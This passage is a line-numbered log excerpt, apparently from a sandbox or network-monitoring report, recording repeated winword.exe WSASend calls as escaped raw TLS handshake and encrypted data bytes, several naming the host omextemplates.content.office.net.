  402. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe2\\xe2\\xd2\\x00s\\x03 b\\x87\\x10\\x88xa\\x92\\xc6\\x87\\xb4\\xd5l\\xfe^5\\x1a\\xa3\\xb5j\\xc1\\xcfap\\xec_\\xcf\\x01\\x19dyg\\xd1\\xfd\\xd2fdf\\xaf\\x12vi\\\\xa5\\x14\\xe7q\\\\xd2\\x04g\\x16\\xf8\\xf21x\\xb6\\x1d\\x1a \\x87\\xca.8\\x06whr\\xdf\\xdf%7e\\xdd\\xddjlt<\\xa2\\xbf\\x12;;\\xc5f\\xab-\\xad\\xb47*t\\x01>\\xd3-\\x81\\x18q\\xbc\\x95*4\\xdct\\x9e\\xbd\\xfet\\x19\\xe9v\\x9c\\xb7e 4g\\x1d9\\xf2q\\x13\\x981\\xa9o\\xc4m\\xb3a\\x89\\x08\\xf3_\\x05\\xe2\\xd8\\x8c\\x7f\\xa1\\xe43fjt\\xf9\\xf4\\x9f\r\\xc4j\\x8a\\xe0\\xe9\\x062\\x06s\\xd6m\\x9f\\x88\\x19@fxl\\xdc\\xe4\\xb33&\\xedgy\\x81\\xbc\\xff\\x1fu\\x82\\xbe\\xcef(\\xa9\\x04\\xe2\\xd0\\xf6\t\\x01\\x82\\xcdj\\xc0`\\xd3^\\xb8\\xc5\\xc4\\xcevq\\x9d\\xc6~\\x19\\x80\\x86s\\xb6\\xc8(\\xf4n\\x0c\\xed\\xc9u\\x8a\\xfe~\\xd9v\\x1bq\\xf5\\xa2\\xc6^\\x9f\\xb9\\x1ex\\xcc\\xc3u\\xec"
  405. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd3\\xe0t\\\\x85\\x82^\\x9a\\xbd\\x93$\\xa5*\\xdd\\x11\\xf9h\\xa3et\\x03m\r\\xc3\\x9c\\xfd\\xf6\\xca1\\xbb\\x0f\\xfb\\xa6\\xd5\\xba\\xc7\\xf1\\xa5\\xf8\\x9fr&\\xcc\\xb47\\xbf\\xbd\\xec_qhe3\\xc5w\\xbf;\\xd2\\xcbx\\xdey\\xdcrk\\xefzv\\xa1ya\\x847\\x986clw\\xbe\\xe1\\xce\\x06\\x15\\xd8\\x07ku3o\\xc6\\x7f\\x02\\x87f\\xf0\\xba\\x1d\\xf4+\\x86j\\xfb+\\xbe\\xceh\\xd7es6\\xce\\xc8\\x8e\\xf1\\x19\\xda\\x88\\x93\\x12s\\xad\\x81\\x19\\xbb *\r\\x96\\xcbi\\xe0y\\xbas\\xbe\\xcb\\x99\\x8d\\xd7\\x83\\xfe\\x85cy,\\xc6\\xff\\x9f\\xb9!\\xa5^\\x92\\x92\\x1d\\x8fv\\xe4~k\\x10\\x9d\\x84\\x82\\x83\\xc8\\xce\\xc7\\xb9\\x94\\x17\\x1a,\\xf7\\x1e9x\\xff\\x04\\xa4lk\\xee4vd|y\\xae\\xab|\\xe7\\xd1.z\\xf2lhdrp\\x1ao\\x19me\\xa4h'\\xb1\\xee\\x83r\\xa35tp\\xbdk\\xe4\\xcd\\x84s\\xd0\\xfd\\xed!\\xb6\\xa3\\xf7\\x88\\x90|\\x85t\\x8ae1a\\x82|v\\x8d\\x9fu\\xd6"
  408. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb6\\x1b\\xa5\\xda\\xfa\\x88\\x9b\\xc1hn\\xa7\\xfb\\xb8\\x8b\\x7fx^\\x84\\xc5\\x89\\xd1\\x95\\x1d\\x0e\\xb6%,\\xcf\\x99i\\x116x\\x9a\\xa7\\xbb\\xe4f\\xc7,\\xd9\\xff\n\\xb5\\x94\\xb0\\xc7y\\xccs\\xbe\\xcf\\x94\\xce7\\xc5\\xd4\\xeb\\xfc\\xe7\\x9b\\x05\\xfa\\x89\\xc1\\xae.\\x0bu\\xd1\\x13\\xfd\\xd1\\xfbd\\xac\\x9d\\xeetw\\xcb\\xce\\xff\\xc1\\xb4g\\x89\\xd1/\\xe9\\x98<\\x7f\\xd1\\x85*\\x97\\x8d\\x9a\\x865|,\\x80s\\xdb\\xccm\\x89*zy\\xd3r\\xc5\\xf4\\xa8\\x99\\x9cn\\xff\\xf27\\x0e\\x01\\xa4/\\xd8=k\\xa5\\x1d\\x9dw\\x8f\\xad\\xc5s\\x87\\xa3\\xe8\\xeez\\x86(c\\xc4\\xdfr\\xec\\xb3n.\\x88vo\\xfc\t\\x97\\x919s\\x19qa\\x98\\xb4j\\x9c\\xd4o!zjv\\xba\\x0c\\xa0\\xcd)\\xe8r\\x8f\\xab\\x98\\xc6\\x0bv\\x95zd\\xb4\\xda\\x17\\x16\"n\\x1b\\xdc\\xfbuh\\xd7\\xf1\\xd08i\\x90\\x87a\\xf9j\\xb0\\x13\\x15\\xe0\\xd41o\\xc7\\xbb\\x0f\\xed\\xee\\xaao\\xf9'\\x07k\\x03z\\x9fr\\x88\\xb1\\xb2\\x82\\xeck\\xc1v(\"h\\x86\\xe6"
  411. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010=\\x9b\\xfe/\\x19\\xbd\\xe6.\\xe2\\x7fr\\xf9\\x81\\xea\\xd6\\x1e\\xab\\xcc\\x81x\\x19\\xfa\\x83x9l\\xc7z\\xa0\\x86\\xef\\xc2\\xfd\\x81mrj\\xadkwy\\xdb\\xcc\\xd7?/\\xfc\\xcfs\\x8a\\x18\\x10e\\xe7\\x8f\"\\x10\\xcf\\xb3\\xa2\\x0c`\\xf0&\\x08'+\\xf1\\xa6\\xe7\\x8f\\xba\\xb0\\xcf\\x0eg\\xf9\\xc8\\x03`d\\xaes\\xea\\x1f\\x16\\xee\\xd2\\x0bf\\xf5pzg7\\xaf\\x15\\xf9\\xb7\\x87v5\\x1f\\xf8t#\\xcb~e\\xb4\\xfc\\x8c\\xf0 s\\xd70\\x10cp\\x15\\x0fb\"t\\xee\\x8fdt\\xcfl\\xcb\\x8d\\x9du\\xad2\\xd0t\\xcd\\xc6\\x03\\x0e7\\xe8\\xfc\\xb7x\\xc2\\x10\\xafr\\x9a\\xbc\\xaew\\x1f\\xd2\\xa3\\xea\\x9e1*\\xc8\\xcf\\xab\\x06@(\\xcf\\xba\\xe2\\xd8\\x83\\xf5\\xfd\\x14\\xb6:\\xef\"\\x8e9d\\xcb\\x14\\xb6\\x92\\x12\\x81\\xff\\x07\\x82\\x95\\xf3tp\\xa8\\xc2bg\\xfch\\x1fsa\\xe7\\xaf\\xee\\xd0\\xbb\\x14.`\"\\xfa\\xa0\\xe5\\xa5\\x00\\xc1\\x8d\\xe2\\xea4p\\7\\xfa\\x95as\r1\\x810c\ny+e\\xea\\xcc\\xee:\\xfa\\xbb\\x12"
  414. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfe\\x90\\x86<\\xd6ws'\\xd4\\x19g\\xb87d\\x14\\xc7p\\xe0-kem\\xdf\\xd2<\\x9az\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  417. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xb1\\xae\\xff|;\\xa6o\\xd0nem\\\\xa0\\x1d\\xe8/\\xb0\\xcbxt\\x10\\xa4\\xfe\\xdb\\xa1)\\x91\\xa8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  420. "http_request": "winword.exe_WSASend_\\xaa\\x02\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x99y\\x03\\x06\\x9cj\\xc2v\\xbe\\xd6\\x14\\xdb\\x13\\xa0n\\xd3\\xeco84\\x1a\\x17b\\xc0\\x80\\x9f;\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  423. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xa4z\\xb1\\x99\\x02cj\\x80\rmy\\xee\\xcf-81b\\xfe\\x86\\xbc\\x86fqt)(n\\x18\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  426. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xccrn|\\xc19\\xed\\xf7\\xb6\\x7f3s\\xa9)\\xc8\\xb0\\xa1\\xdf!\\xb4=\\x131d\\xffe\\xd7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  429. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\n\\x01i\\xe09\\xfa60l\\xd3l*\\xef(e$\\x9e\\xaa\\xc8\\xd9h\\xe6\\xb0)\\xb7p;\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  432. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x88\\xf5\\xb0\\x87q\\xcbl\\x9c\\x1b\\x81t\\xe4\\xf2\\xad\\xa3n7\\x9eo\\xf9\\x9fh\\xd5\\xbd\\x90eo\t\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  435. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8c\\xb1\\x0c\\x18\\xfd\\x7f\\xc8\\x13\\x93\\xdd\\x90\\xd8g\\xf9c\\xb7\\xf8\\x10\\xc9\\xeb\\x8a q\\xcd\\x0c\\xc81(4k\\xd8\\xf4\\xc3\\xb0c\\x96!\\xf1\\xc4\\xbe\\x89\\xa7h<\n\\xb5\\xe7k\\xe5x\\xfc\\x97q\\xaa9\\x16\\xa9`\\xa9\\x94\\xdc\\xa2!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x036g\\xd1$3\\xe8\\x81\\xb6\\xf1\\x19\\x96\\xb1\\xdd\\xa2\\x89\\xc9\\xa7\\x19\\xd7i@\\x8d\\xdf\\xfc\\x993la\\xaf\\x00\\xc1\\xfe\\xb1\\x0e\\xd2x\r\\xea\\xd5\\xd4c\"\\x83q\\x81\\x9br"
  438. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xae4v\\x8a\\xb4\\x92z\\x88\\x99\\xae\\xec\\x06ehwt5\\xb7c\"fx\\xdejylk\\xd6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  441. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5x\\x91\\xc3l\\xa4\\x0c\\x9b\\x1e\\x7fz\\x9duao\\x98=.\\x08\\x94\\xa0\\xce\\xd4\\x06\\xc1n\\xc7;\\x01\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  444. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xa2\\x17t\\x96o\\xae\\xde\\x16\\x06\\xc9\\xd5cu\\xac\\xf7\\xda\\xe7\\xc8,\\xefq\\x1b\\x08u\\xf18\\x95\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  447. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5t\\xf1\\x93\\xd8\\xbe)3\\xbc\\x9b\\x02\\xb9\\x03\\x10\\xa7\\x99\\xe8|\\xc8\\x10\\xbf\"o\\xffa\\x95\\xe8\\xfe\\x05\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  450. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x1f^\\x91\\xb7\\xda<,\\xb9(i\\xb0\\xc0cr\\x18\\xc6d\\xab\\xb6\\x9e\\xdd\\xdd\\x850\\x8ac_\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  451.  
  452.  
  453. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5(\\xb3\\\\xed\\xa5h\\x9f\\xd7@x\\x89\\/?3\\x94\\xd1m\\xa8\\xc8\\x04m\\xb5yc\\x87\\xcb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  454.  
  455.  
  456. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfb\\xdc\\xab\\xdbh\\xb3\\x94\\x86\\x18\\xe9'\\x91\\xf3p4x\\x17\\x1b6\\x02d\\xc7\\x82gz\\xab\\xa9\\x10\\xf3\\x9f\\xd4\\xe0\\xa2a\\xca\\xf5\\x01\\xa0\\xac\\xec\\xb8\\xde\\x8e\\x98\\xf2b\\xc2\\xa1p\\x80\\xa4\\x93\\xa3\\xfa\\xfc3k\\xac\\xd4\\xe9aw\\x1e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xeb\\xee\\x123\\x17b2\\x82\\xb2 \\xf7\\xcf\\xa89pwq\\x9a\\x1a\\x0em\\xb8\\xe7x$\\x0b\\x8e\\x1a\\x05\\xbfx\\x0c\\xff\\xf7\n2\\x9d\\xe3\\xf3\\x96\\xect\\x89\\xbe/\\x14"
  457.  
  458.  
  459. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbb\\x08\\xfed\\x13\\xf1\\xdfx\\x8d\\xc2\\xf4\\xe4rd&:4\\xf75\\xf3\\xdd\\xba\\x80\r\\xe3\\xd6\\x87\\xd4\\x02\\xd1\\x9f%\\xea\\xdb6@\\xcan\\xae\\x16\\xdd\\xf0\\xd7\\xdc\\x82#%\\xd7a\\x94.\\xca\\xf5h\\xd4\\xf4\\x05\\x99#\\xc6\\xea\\x91t\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\x81\\x90\\xf9\\xc7\\xef\\xfds\\xc6\\xe6\\x13\\xb9`lh\\x03\\x10\\xc3\\x84v\\xbb\\x80zv\\xa0x\\x8e\\xb13\\xae\\xb0\\xb7d\\xe9hga\\x95\\x85\\x06l\\xa8`\\xafa\\xaa\\xd4\\xa9"
  460.  
  461.  
  462. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9f\\x15\\x07ygs\\xac\\xe6\\xed\\x9c\\xd7\\x8f\\xf2\\x9d\\x1cp\\xb0\\xf1\\xd4for\\xaem\\x8f\\x98w\\xb0 \\xf1\\x95\\xff\\x1f\\xe22\\xc1\\x9a\\xd4\\xd8\\xbb\\xec\\xc3\\x01\\x8c\\x18\\x99:\\xe5\\x9foh\\x84=\\xa2\\x9e\\xe8\\xbf\\x9a\\xb9n\\x8f\\xda\\xbf\\xf0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000y\\x11'\\x8b\\x90f\\xeb\\x03^i\\xa6s\\xff\\xaah\\xef4:-h\\xfc\\xc6j\n\\xfb\\xb6i\\x04\\xc8\\xca\\xc5\\x9e\\xcb\\xa4\\xc7 &f\\xa0\\x04f\\xb0\\x06ep\\xcaw"
  463.  
  464.  
  465. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04nj\\x1e\\xcc\\x1ej\\x97p-iw\\x05\\xc4\\xc0\\x95\\xeb\\x8c\\xd11\\x90\\x0fx\\xcc3\\x94x\\x00\\x14t7\\xc02\\xde!\\xae\\xbd\\xff\\x0f\\xdb\\xde\\xae+\\xc6\\xe1\\xb4\\xa7b\\xa2\\xf2\\xd6\\xc0k\\xbe\\xd7\\xa8*\\xd8%\\x7f\\xc1*\\x95\\xf2\\x9f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000x\\xb5\\xa9\\x9c\\x17$\\xd5\\xd4\\x8e\\xca<x\\xdfe!\\xa8nr\\xc1\\xb2\\xf2ym;\\x99f\\xc2f\\x82\\x91r\\xab\\xe6\\x05\\xaf\\xfc\\x80tr\\xc2&\\x85\\xfb\\xf9d "
  466.  
  467.  
  468. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x8b\\x84\\xfc\\x0b\"gl\\x1csy\\x7f#\\xcd1\\xc6y\\xd4\\x80\\xf7\\x8f\\x93\\xa4\\xf8)\\x9d\\xf4s1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  469.  
  470.  
  471. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee51\\xf1\\x86qn\r\\x14x\\xdevpw\\x83\\x9a a\\xad\\x17\\xd8\\xc4r9\\x111\\xf7\\xaae\\xeb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  472.  
  473.  
  474. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x174\\xaf\\x16\\xb9\\x86\\x11\\x8c\\xfd\\x83\\xd4\\x85u\\xf9\\x93z\\x956\\xe0x\\xe9\\x87v\\xb9\\x03\\xad\n~\\xba\\x1dj\\xc2\\xce\\xd5\\xbbx\\xa0fn\\x08\\xc6\\x92\\xc0\\x11\\xa1\t4\\xd4\\xa2\"-\\xea\"@\\x18\\xbc'\\xf5\\xb9\\xe3\\x12\\x9e\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000<\\xa5`\\xb4\\x03\\xd0\\xd7\\xed\\x1e0\\xb2\\x1cl\\x14\\xa3_\\x1fb\\x12,o\\x17\\xcc\\xc1ik\\xf4a?\\xe5\\x19x\\xff\\xbb\\x10\\xf7(\\x140\\xda\\x10\\xe9\\x81\\xd4k\\xda\\x00"
  475.  
  476.  
  477. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa9\\xc2ay\\xf9p\\xbeu\\xb2'\\x15`q\\xd6\\xab\\xceq^\\xbe\\xbb\\xce,3\\x9e\\xa1mv\\xb0\\xbc\\xd3\\xd7k\\x0b\\xb7\\x15\\xc2u\\x9fub\\xf6\\xd3\\x16\\xd9.\\xd3\\xc2\\xee\\x1d\\xee\\x1fi\\xa2\\xf1\\xb1yv\\xaf\\x7f\\x98d\\xc4\r\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000i7\\x05gwr\\x88d\\xd1\\x06\\xef\\x057\\xa6e\\x0bq\\x8f\\xe8\\xc6=x\\x98\\xff\\x93\\x8d7*\\x19\\xa2\\xda\\x11h\\xa8\\x05\\xc6y\t\\xc0\\xc0\\x8a af\\xe78\\x18"
  478.  
  479.  
  480. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5 v$\\xee\\xb2\\xed\\xcai\\xaf\\xf9\\x99\\xf1\\x9b\\xd9,\\xa7\\xfe\\x13\\x10\\x0c\\xe3\\xb1\\xael\\xcd:\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  481.  
  482.  
  483. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x1e\\x03\\xfez%\\xea\\x14~q\\xe8\\xb7\\xdc\\x84i%e\\x185\\x0e2\\xdc8\\x92\\xe4^p\r\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  484.  
  485.  
  486. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc5/y:\\x135|vnk\\xb80e\\x81\\xd8\\xa8c=\\xb0\\xcd|i\\xcc\\xc6\\x86\\xb9\\xe4\\xa3\\xd4\to\\xd3?\\xe4\\xbb\\xc2\\x96\\xde\\x1f\\xee\\x94u\\xd3\n\\x9f\\xfa\\xf8\\x079\\xc4\\xcex2\\xa1nq`\\xe6\\xfa%\\x97\\xb9z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x83\\x1b\\xf5\\x18\\x7f\\xb2\\x89\\x1d\\x8an\\x99\\xd5\\xb5\\x07\\x95\\xc6\\xedo\\x1a`u\\xfd\\xc0\\xbb\\x90)1\\xa5\\xd0\\x80i(u\\x89\\xe1\\xa5h\\xb2\\x03\\xcb\\xe9\\xf6\\xfd\\x86\\"
  487.  
  488.  
  489. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04p\\x8a~\\xa3\\x9c\\xaa\\xfe\\xba\\xb6\t\\xe1\\x19\\xe6\\xa8b\\x8c\\xc6\\xb2\\xe9\\xfe\\xa0\\xfb\\x159\\xc8 \\x93=\\x99\\xb5\\xcd\\xe3\\xa2\\x81g\\x10r\\xd9\\x195\\x96\\x9e\\x12\\xbb\\x12\\xf7\\x04\\xa0\\xc5\\xee\\x9c\\x9e\\x86 \\x0fg\\x88\\xe1\\x0f b\\xe9\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbfirn\\xa6\\x93y\\xb6\\xbb\\xa4\\xa1\\xd8\\x89ou\\xfbt\\xc7\\x9b_\\x0c\\xcdm1mu\\xa3\\x82\\x94 k\\x8f\\xd8\\xda\\xd0 \\xdc\\xc2jh\\x05|c/f\to"
  490.  
  491.  
  492. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x82\\x8fx\\x17/\\xfc\\xcc7\\x90\\x0c#d\\x8b\\xdb\\xdefl\\xdb\\xf4;n\\xce\\x96\\x05m\\xe2\\x83\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  493.  
  494.  
